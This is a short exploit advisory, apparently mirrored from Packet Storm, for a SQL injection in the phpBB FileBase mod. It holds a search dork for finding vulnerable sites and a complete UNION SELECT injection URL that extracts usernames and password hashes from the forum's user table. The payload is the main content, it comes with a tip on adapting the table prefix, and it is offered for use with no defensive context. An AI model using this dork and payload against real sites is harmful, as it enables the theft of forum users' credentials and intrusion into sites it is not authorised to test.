phpbbfilebase-sql.txt

🗓️ 13 Mar 2008 00:00:00Reported by t0pp8uzzType

packetstorm🔗 packetstormsecurity.com👁 17 Views

phpBB MOD FileBase SQL Injection Vulnerabilitys by t0pP8uZz & xpro

`--==+================================================================================+==--  
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
  
AUTHOR: t0pP8uZz & xprog  
SITE: N/A  
DORK: inurl:"filebase.php" "Powered by phpBB"  
  
  
DESCRIPTION:   
  
  
EXPLOITS:  
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*  
  
  
NOTE/TIP:   
phpbb prefix may need changining.  
  
  
GREETZ: milw0rm.com, h4ck-y0u.org !  
  
  
--==+================================================================================+==--  
--==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==--  
--==+================================================================================+==--  
  
`

13 Mar 2008 00:00Current

7.4High risk

Vulners AI Score7.4